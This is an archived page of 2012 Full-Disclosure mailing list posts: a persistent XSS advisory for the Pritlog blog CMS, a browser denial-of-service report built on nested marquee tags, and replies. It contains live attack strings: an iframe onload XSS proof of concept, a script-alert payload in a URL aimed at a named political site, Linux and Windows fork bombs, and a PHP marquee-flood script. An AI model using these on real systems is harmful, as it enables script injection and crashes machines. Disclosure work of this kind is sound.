[Full-disclosure] Pritlog v0.821 CMS - Multiple Web Vulnerabilities

2012-04-30 Thread Research
Title:
==
Pritlog v0.821 CMS - Multiple Web Vulnerabilities


Date:
=
2012-04-29


References:
===
http://www.vulnerability-lab.com/get_content.php?id=534


VL-ID:
=
534


Introduction:
=
PRITLOG is an extremely simple, small ( 500K uncompressed) and powerful blog 
system. It does not use or need 
a MYSQL database and fully works based on Sqlite. Sqlite is very similar to 
flat files and does not need any 
server setup and comes as default with most PHP5 installations. Just drop 
Pritlog into your server and it 
starts running. No separate installation is required.

Feature(s):
* WYSIWYG editor - nicEdit
* Admin interface (change site properties, add authors, change 
password)\\\'\\\'\\\'
* Easy translation. Language selection available in the admin panel. Language 
files must be created.
* Sticky Posts
* Integrated login system with registration
* Pretty Urls
* SEO Optimization
* Page functionality for static pages
* Social Bookmarking widget: to enable easy sharing of post/blog
* Bbcode by editing html (work around)
* RSS Feeds
* Additional authors can be added by the admin
* Post Options w/ Teaser + Full Story (using *readmore* in the post)
* Ability to enable / disable comments per post * Global privacy option
* Ajax and jQuery for better user experience
* Post auto-save feature
* Category cloud
* Theme engine for easy theme creation
* Plugins to easily add functionality 


(Copy of the Vendor Homepage: http://pritlog.com/fossil.cgi/taglist )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in Pritlog v0.821 Content Management System.


Report-Timeline:

2012-04-29: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the 
Pritlog v0.821 Content Management System. The bugs 
allow remote attackers to implement/inject malicious script code on the 
application side (persistent). Successful exploitation 
of the vulnerability can lead to session hijacking (manager/admin) or stable 
(persistent) context manipulation. Exploitation requires 
low user inter action. Attackers can inject malicious strings as author name to 
execute them when an admin is processing to preview, review 
or manage the listing of users. The bug is located on application side  the 
execution is persistent out of the user management web 
application context.

Vulnerable Module(s):
[+] Manage User Listing - Username  Author

Picture(s):
../1.png
../2.png


Proof of Concept:
=
The vulnerability can be exploited by remote attackers with low required user 
inter action. For demonstration or reproduce ..

URL: http://127.0.0.1:1337/pritlog/index.php/adminPageAuthors

fieldset
legendManage Authors/legend
table
tbodytrtdstrongAuthor: /strongiframe src=a onload='alert(vl)' 
br=br/td
tdlabel for=authorEmailEmail/labelbr
input type=text name=authorEmail id=authorEmail 
value=f...@aol.com/td/tr


Risk:
=
The security risk of the persistent input validation vulnerability is estimated 
as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Chokri Ben Achor 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, 
of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified 
form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 
Vulnerability-Lab




-- 
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: resea...@vulnerability-lab.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera

2012-04-30 Thread MustLive
Hello list!

I want to warn you about Denial of Service vulnerability in Mozilla Firefox, 
Internet Explorer and Opera. Earlier there was published DoS vulnerability in 
browser Opera 10.10 found by Inj3ct0r 
(http://securityvulns.com/news/Opera/1002.html). And some time ago I've checked 
this exploit and found that many other browsers are vulnerable to this attack.

These are Denial of Service vulnerabilities in Mozilla Firefox, Microsoft 
Internet Explorer and Opera. They belong to type 
(http://websecurity.com.ua/2550/) crashing DoS, blocking DoS and resources 
consumption DoS.

The exploit from Inj3ct0r is similar to the exploits, which I've made for 
Google Chrome (for my project Day of bugs in Google Chrome) and Mozilla 
Firefox in 2008. Attack in my exploits was conducting via large amount of 
nested marquee tags, and in his case the html, marquee and h1 tags were used. 
But the essence is the same - large amount of nested tags (particularly 
marquee). That time I've informed Google and Mozilla and placed Bug 454434 
(https://bugzilla.mozilla.org/show_bug.cgi?id=454434) in Bugzilla, but if 
Google had fixed the hole, Mozilla hadn't fixed this vulnerability.

-
Affected products:
-

Vulnerable are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, 4.0 beta 2, 11.0, 
Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), 
Internet Explorer 8 (8.00.6001.18702) and Opera 10.62, and previous versions of 
these browsers also must be vulnerable. Other browsers can be vulnerable as 
well.

--
Details:
--

DoS (WASC-10):

This is my version of the exploit for different browsers.

http://websecurity.com.ua/uploads/2012/Firefox,%20IE%20%20Opera%20DoS%20Exploit.html

This exploit uses JS, but attack can be conducted and without JS - as it shown 
in my 2008's exploit 
(http://websecurity.com.ua/uploads/2008/Firefox%203%20DoS%20Exploit.html).

This exploit works in the following way:

* Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM) and 
crashes.
* Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM) and 
crashes.
* Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM) and 
crashes.
* Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and a lot 
of RAM).
* Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot of 
RAM).
* Internet Explorer 6 freezes and consumes resources (50% CPU and a lot of RAM).
* Internet Explorer 7 freezes and consumes resources (50% CPU and a lot of RAM).
* Internet Explorer 8 only consumes resources (50% CPU and a lot of RAM). I.e. 
in IE8 the problem was partly fixed by Microsoft.
* Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).
* The exploit doesn't work in browser Google Chrome already since version 
1.0.154.48. Google fixed vulnerability with marquee tag after my informing in 
2008.


Timeline:
 

2012.04.23 - disclosed at my site (http://websecurity.com.ua/5808/).
2012.04.24 - reminded Mozilla that they still hadn't fixed 2008's hole.

Best wishes  regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera

2012-04-30 Thread Valdis . Kletnieks
On Mon, 30 Apr 2012 15:37:08 +0300, MustLive said:

 * Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM) and 
 crashes.
 * Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM) and 
 crashes.
 * Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM) and 
 crashes.
 * Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and a 
 lot of RAM).
 * Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot of 
 RAM).
 * Internet Explorer 6 freezes and consumes resources (50% CPU and a lot of 
 RAM).
 * Internet Explorer 7 freezes and consumes resources (50% CPU and a lot of 
 RAM).
 * Internet Explorer 8 only consumes resources (50% CPU and a lot of RAM). 
 I.e. in IE8 the problem was partly fixed by Microsoft.
 * Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).

Anybody want to guess how many cores are on his test box? :)


pgpUhWZRZilnh.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CWEs translation

2012-04-30 Thread Jerome Athias
Hi list,

I finished the translation into french of all available CWEs (Titles +
Descriptions).
We use it for our CERT.
I should soon share this work with french CERTs, but I would like to
know if others could provide a translation in other languages?
(I know some spain guys are working on it)

Thanks
My 5 euro cents

-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
www.netpeas.com
-

The computer security is an art form. It's the ultimate martial art.



smime.p7s
Description: Signature cryptographique S/MIME
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS in UMP-Sarkozy mailer system

2012-04-30 Thread Jerome Athias
tk3.rylyo.com/14/usb.htm?p=cfmel=jer...@netpeas.comadm=scriptalert('p0wned');/scriptl=fr



smime.p7s
Description: Signature cryptographique S/MIME
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera

2012-04-30 Thread InterN0T Advisories
Hello list!

I also want to warn you about Denial of Service vulnerability, in almost
every Operating System there is, by e.g., opening a lot of programs at the
same time, or by using Fork bombs such as this in the Linux console: :(){
:|: };: (Reference: http://en.wikipedia.org/wiki/Fork_bomb ), in Windows
this bug can be: %0|%0 and in browsers, creating a HTML file that writes a
million marquee tags will also make the browser freeze in most cases with
current computing technology.

Proof of Concept:
?php
// Secret Leaked MustLive DoS script

$i = 0;
$count = 100;
$omg = marqueeHello list! I want to warn you about
vulnerability!/marquee;

while ($i = $count):
echo $omg; // -- Send this to FD soon and say it's a bug I discovered a
couple of years ago to make it look even more cool along with 5 links to my
website so it can receive more backlinks and a higher page rank hopefully.
$i++;
endwhile;

?

While this bug can't be fixed, it will always be a problem (in the future
it will just be larger scales), but as I just stated, it can't be fixed. It
is the same as trying to run Crysis on a Commodore64, it may be possible,
but your machine will respond as if it is experiencing a Denial of Service
attack, if it doesn't report an error such as Insufficient memory or Out
of memory and crashes instead.



To make up for the MustLive linkspam and this reply, here's a few
unrelated links that may interest you:
http://www.wired.com/threatlevel/2012/04/ruggedcom-backdoor/
http://blog.spiderlabs.com/2012/04/pwning-a-spammers-keylogger.html
http://group-ib.com/images/media/Group-IB_Report_2011_ENG.pdf (State and
Trends of the Russian Digital Crime Market)
http://dualcoremusic.com/nerdcore/upload/dual_core-control.mp3 (Dual Core
- Control, it's a song for The Social Engineer Podcast and Chris Hadnagy of
course.)
http://abcnews.go.com/Technology/wireStory/report-iran-unplugs-oil-facilities-internet-16194653#.T58cOcXSoV0

Note that I have absolutely no relation to any of the websites above.



Best regards,
Nemesis 3.0

On Mon, 30 Apr 2012 15:37:08 +0300, MustLive
mustl...@websecurity.com.ua wrote:
 Hello list!
 
 I want to warn you about Denial of Service vulnerability in Mozilla
 Firefox, Internet Explorer and Opera. Earlier there was published DoS
 vulnerability in browser Opera 10.10 found by Inj3ct0r
 (http://securityvulns.com/news/Opera/1002.html). And some time ago I've
 checked this exploit and found that many other browsers are vulnerable
to
 this attack.
 
 These are Denial of Service vulnerabilities in Mozilla Firefox,
Microsoft
 Internet Explorer and Opera. They belong to type
 (http://websecurity.com.ua/2550/) crashing DoS, blocking DoS and
resources
 consumption DoS.
 
 The exploit from Inj3ct0r is similar to the exploits, which I've made
for
 Google Chrome (for my project Day of bugs in Google Chrome) and
Mozilla
 Firefox in 2008. Attack in my exploits was conducting via large amount
of
 nested marquee tags, and in his case the html, marquee and h1 tags were
 used. But the essence is the same - large amount of nested tags
 (particularly marquee). That time I've informed Google and Mozilla and
 placed Bug 454434 (https://bugzilla.mozilla.org/show_bug.cgi?id=454434)
in
 Bugzilla, but if Google had fixed the hole, Mozilla hadn't fixed this
 vulnerability.
 
 -
 Affected products:
 -
 
 Vulnerable are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, 4.0 beta 2, 11.0,
 Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13),
 Internet Explorer 8 (8.00.6001.18702) and Opera 10.62, and previous
 versions of these browsers also must be vulnerable. Other browsers can
be
 vulnerable as well.
 
 --
 Details:
 --
 
 DoS (WASC-10):
 
 This is my version of the exploit for different browsers.
 

http://websecurity.com.ua/uploads/2012/Firefox,%20IE%20%20Opera%20DoS%20Exploit.html
 
 This exploit uses JS, but attack can be conducted and without JS - as it
 shown in my 2008's exploit

(http://websecurity.com.ua/uploads/2008/Firefox%203%20DoS%20Exploit.html).
 
 This exploit works in the following way:
 
 * Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM)
and
 crashes.
 * Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM)
and
 crashes.
 * Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM)
and
 crashes.
 * Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and
a
 lot of RAM).
 * Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot
 of RAM).
 * Internet Explorer 6 freezes and consumes resources (50% CPU and a lot
of
 RAM).
 * Internet Explorer 7 freezes and consumes resources (50% CPU and a lot
of
 RAM).
 * Internet Explorer 8 only consumes resources (50% CPU and a lot of
RAM).
 I.e. in IE8 the problem was partly fixed by Microsoft.
 * Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).
 * The exploit doesn't work in browser Google Chrome already